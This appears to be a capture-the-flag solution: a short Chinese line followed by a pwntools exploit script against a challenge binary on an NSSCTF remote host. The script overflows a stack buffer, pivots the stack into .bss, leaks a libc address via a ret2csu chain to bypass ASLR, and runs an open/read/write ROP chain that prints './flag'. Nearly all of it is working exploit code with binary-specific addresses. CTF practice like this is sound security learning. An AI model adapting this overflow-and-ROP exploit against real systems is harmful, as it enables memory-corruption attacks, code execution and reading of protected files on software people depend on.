栈迁移+orw,这里控制好rbp即可
exp如下;
"""Exploit script for the target binary ./pwn: stack pivot + ret2csu leak + open/read/write chain.

Flow, as written below: a first overflow sets the saved rbp to .bss and returns
into vuln; a second buffer pivots the stack into .bss and leaks puts@GLIBC; a
third buffer pivots again into an open/read/write chain on "./flag".  Every
address in this file is specific to the binary and libc it was written against.
"""
from pwn import *
from ctypes import *

context(arch = 'amd64', os = 'linux', log_level = 'debug')
context.terminal = ['tmux','splitw','-h']

# Thin send/receive helpers; they resolve the global tube `io` at call time.
s = lambda content : io.send(content)
sl = lambda content : io.sendline(content)
sa = lambda content,send : io.sendafter(content, send)
sla = lambda content,send : io.sendlineafter(content, send)
rc = lambda number : io.recv(number)
ru = lambda content : io.recvuntil(content)
rcl = lambda : io.recvline()


def slog(name: str, address: int) -> None:
    """Print `[+]name==>0x...` wrapped in ANSI colour escapes."""
    print("\033[40;34m[+]\033[40;35m" + name + "==>" +hex(address) + "\033[0m")


def debug(cmd = 0) -> None:
    """Attach gdb to `io`; `cmd` is passed through to gdb.attach as its script.

    0 (the default) is used as the "no script" sentinel rather than None.
    """
    if cmd == 0:
        gdb.attach(io)
    else:
        gdb.attach(io, cmd)


def get_address(mode: int = 0) -> int:
    """Read a leaked address from `io` and return it as an int.

    mode 0: receive until a 0x7f byte and unpack the last 6 bytes as a little-endian pointer.
    mode 1: unpack 6 raw bytes.
    mode 2: parse 12 hex characters.
    mode 3: parse 16 hex characters.
    Any other mode returns 0 instead of raising.
    """
    if mode == 0:
        return u64(ru('\x7f')[-6:].ljust(8, b'\x00'))
    elif mode == 1:
        return u64(rc(6).ljust(8, b'\x00'))
    elif mode == 2:
        return int(rc(12), 16)
    elif mode == 3:
        return int(rc(16), 16)
    else :
        return 0


# NOTE(review): the local process is spawned and then immediately overwritten by
# the remote tube, so it is never closed; keep only one of the two lines.
io = process("./pwn")
io = remote("node4.anna.nssctf.cn", 28988)
elf = ELF("./pwn")

# Binary-specific addresses (the fixed 0x40xxxx values suggest a non-PIE build — confirm).
puts_plt = 0x4010b0
puts_got = elf.got['puts']
vuln = 0x401292          # vulnerable function, re-entered after each overflow
bss = 0x404560
ret = 0x40101a           # `ret` gadget, used as padding
rcu_high = 0x401330      # presumably the two halves of __libc_csu_init — confirm in the binary
rcu_low = 0x40134a
leave_ret = 0x40121d     # `leave; ret`, performs the stack pivot

# Stage 1: 0x210 bytes of filler, saved rbp -> bss, return into vuln.
payload = b"a"*0x210 + p64(bss) + p64(vuln)
sa("it\n", payload)

# Stage 2: ret sled + csu chain that calls puts(puts_got) to leak libc, then
# returns into vuln; the trailing (rbp, leave_ret) pair pivots into this buffer.
payload2 = p64(ret)*0x4
payload2 += p64(rcu_low) + p64(0) + p64(1) + p64(puts_got) + p64(0)*2 + p64(puts_got) + p64(rcu_high) + p64(0)*2 + p64(0x404860) + p64(0)*4 + p64(vuln)
payload2 = (payload2).ljust(0x210, b'\x00')
payload2 += p64(0x404360) + p64(leave_ret)
s(payload2)

# 0x84420 is assumed to be puts' offset in the target libc — verify against ./libc.so.6.
libc_base = get_address() - 0x84420
slog("libc_base", libc_base)
libc = ELF("./libc.so.6")
system = libc_base + libc.sym['system']              # unused below: the chain is open/read/write
binsh = libc_base + next(libc.search(b'/bin/sh'))   # unused below
pop_rdi = 0x401353                                   # gadget in the binary
pop_rsi = 0x2601f + libc_base                        # libc gadgets: offsets are libc-version-specific
pop_rdx = 0x142c92 + libc_base
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
write_addr = libc_base + libc.sym['write']

# Stage 3: "./flag" at the start of the buffer, then
# open(0x404650, 0) / read(3, 0x404200, 0x30) / write(1, 0x404200, 0x30).
# 0x404650 is presumably where "./flag" lands after the pivot to 0x404660 — confirm.
payload3 = b'./flag\x00\x00' + p64(ret)*0x5
payload3 += p64(pop_rdi) + p64(0x404650) + p64(pop_rsi) + p64(0) + p64(open_addr)
payload3 += p64(pop_rdi) + p64(3) + p64(pop_rsi)+ p64(0x404200) + p64(pop_rdx) + p64(0x30) + p64(read_addr)
payload3 += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(0x404200) + p64(pop_rdx) + p64(0x30) + p64(write_addr)
payload3 = (payload3).ljust(0x210, b'\x00')
payload3 += p64(0x404660) + p64(leave_ret)
s(payload3)
io.interactive()
